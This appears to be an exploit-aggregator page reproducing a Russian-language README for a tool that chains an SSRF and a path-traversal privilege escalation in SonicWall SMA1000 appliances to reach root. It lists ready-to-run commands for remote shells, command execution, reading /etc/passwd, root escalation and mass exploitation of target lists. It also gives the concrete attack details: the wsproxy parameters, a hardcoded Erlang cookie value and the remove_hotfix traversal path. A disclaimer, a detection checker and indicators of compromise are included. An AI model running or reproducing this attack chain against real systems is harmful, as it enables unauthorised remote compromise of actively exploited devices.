## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TC4DY-CVE-2026-15409-15410-FRAMEWORK

   
   
## [1] CVE-2026-15409 | [2] CVE-2026-15410
## SonicWall SMA1000 – SSRF → Erlang RCE → Root Privesc
**Фреймворк для эксплуатации и инструмент безопасного обнаружения**
_Только для авторизованного тестирования безопасности._
* * *
## ⚖️ Правовое предупреждение и ответственное использование
**Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение.**
Авторы и соавторы не несут ответственности за любое неправомерное использование или ущерб, причинённый данным программным обеспечением. Пользователи несут полную ответственность за получение явного письменного разрешения от владельца цели перед тестированием. Несанкционированный доступ к компьютерным системам является незаконным в соответствии с Законом о компьютерном мошенничестве и злоупотреблениях (CFAA) и аналогичными законами по всему миру.
Используя данное программное обеспечение, вы соглашаетесь:
* Использовать его только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.
* Соблюдать все применимые местные, государственные и федеральные законы.
* Не использовать его для вредоносных, разрушительных или незаконных действий.
> ⚠️ **ПРЕДУПРЕЖДЕНИЕ:** Эта уязвимость активно эксплуатируется в реальных атаках. Несанкционированное использование может привести к серьёзным юридическим последствиям.
* * *
## 🔥 Обзор уязвимости
**CVE-2026-15409** — это критическая **неаутентифицированная подделка серверных запросов (SSRF)** в интерфейсе Work Place устройства SonicWall SMA1000.
**Как это работает:**
1. Злоумышленник использует SSRF для туннелирования через конечную точку `wsproxy`.
2. Это предоставляет доступ к внутренним службам распределения Erlang (порты 1050/8188).
3. Используя жёстко заданную cookie по умолчанию, злоумышленник аутентифицируется на узле Erlang.
4. Удалённое выполнение кода (RCE) достигается через вызовы `os:cmd/1`.
5. Затем **CVE-2026-15410** используется для повышения привилегий до **root** через обход пути в AMC (Appliance Management Console).
**Ключевые факты:**
* 📅 **Раскрыта:** 14 июля 2026 г.
* ⚠️ **Оценка CVSS:** 10.0 (КРИТИЧЕСКАЯ)
* 📋 **CISA KEV:** Добавлена 14 июля 2026 г. (Срок: 17 июля 2026 г.)
* 🎯 **Затронутые продукты:** SMA 6210, SMA 7210, SMA 8200v
* 🔄 **Исправленные версии:** 12.4.3-03453+ и 12.5.0-02835+
* * *
## 🛠️ Фреймворк эксплуатации (`exploit.py`)
**Полноценный эксплойт** связывает CVE-2026-15409 и CVE-2026-15410 для достижения компрометации на уровне root.
### ✨ Возможности:
* * *
## 📦 Установка и требования
### Предварительные требования:
* Python 3.6+
* `pip` (для библиотеки `requests`)
### Установка зависимостей:
root@kitploit:~
pip install -r requirements.txt
### [!] Примечание: exploit.py использует собственную реализацию WebSocket — библиотека websockets не требуется. Библиотека requests нужна только для функции --detect.
# 🚀 Примеры использования
### [2] Фреймворк эксплуатации (exploit.py)
root@kitploit:~
# Интерактивная оболочка на цели
python exploit.py -u 192.168.1.100
# Выполнение одной команды
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Чтение файла
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# Включение обнаружения SSRF перед эксплуатацией
python exploit.py -u 192.168.1.100 --detect
# Попытка повышения до root
python exploit.py -u 192.168.1.100 --privesc
# Массовая эксплуатация из файла (50 потоков)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Пользовательский порт и путь
python exploit.py -u 10.0.0.5 -p 8443 --path /workplace
# Режим канала (чтение команды из stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
### [2] Безопасная проверка (checker.py)
root@kitploit:~
# Сканирование одной цели
python checker.py https://192.168.1.100
# Пользовательский порт и путь
python checker.py 192.168.1.100 --port 8443 --path /workplace
# Массовое сканирование из файла
python checker.py --list targets.txt
## 🎯 Уязвимые версии
> ⚠️ **Важно:** Эти уязвимости не затрагивают межсетевые экраны SonicWall (SSL-VPN) и серию SMA 100.
* * *
## 🧠 Технические детали
### SSRF (CVE-2026-15409)
Конечная точка `wsproxy` на порту 443 принимает параметр `bmID`, начинающийся с `-3389`, и спецификацию `host:port`. Указывая `host=127.0.0.1` и `port=1050`, атакующие могут туннелироваться к внутренней службе распределения Erlang.
### Erlang RPC
Узел Erlang использует жёстко заданную cookie по умолчанию: `10ecad5b446e86864832904cd439b6b70262`. Это позволяет удалённо аутентифицироваться и выполнять любые вызовы `os:cmd/1`.
### Повышение до root (CVE-2026-15410)
После аутентификации эксплойт записывает shell-скрипт в `/var/tmp/` и инициирует конечную точку XML-RPC `remove_hotfix` AMC с обходом пути (`../../../../var/tmp/script.sh`), выполняя скрипт от имени root.
* * *
## 🔍 Индикаторы компрометации (IoCs)
SonicWall рекомендует проверять:
* `extraweb_access.log` на наличие `/__api__/login` или `/__api__/logout` (статус 200)
* `extraweb_access.log` на наличие `/wsproxy` с подозрительными параметрами host (статус 101)
* `ctrl-service.log` на наличие откатов исправлений с обходом пути
* `/var/lib/unit/conf.json`, содержащий маршруты для `/__api__/login` или `/__api__/logout`
* * *
## 📚 Ссылки
* NVD - CVE-2026-15409
* SonicWall Advisory (SNWLID-2026-0008)
* CISA KEV Catalog
* The Hacker News - Two SonicWall SMA 1000 Zero-Days Exploited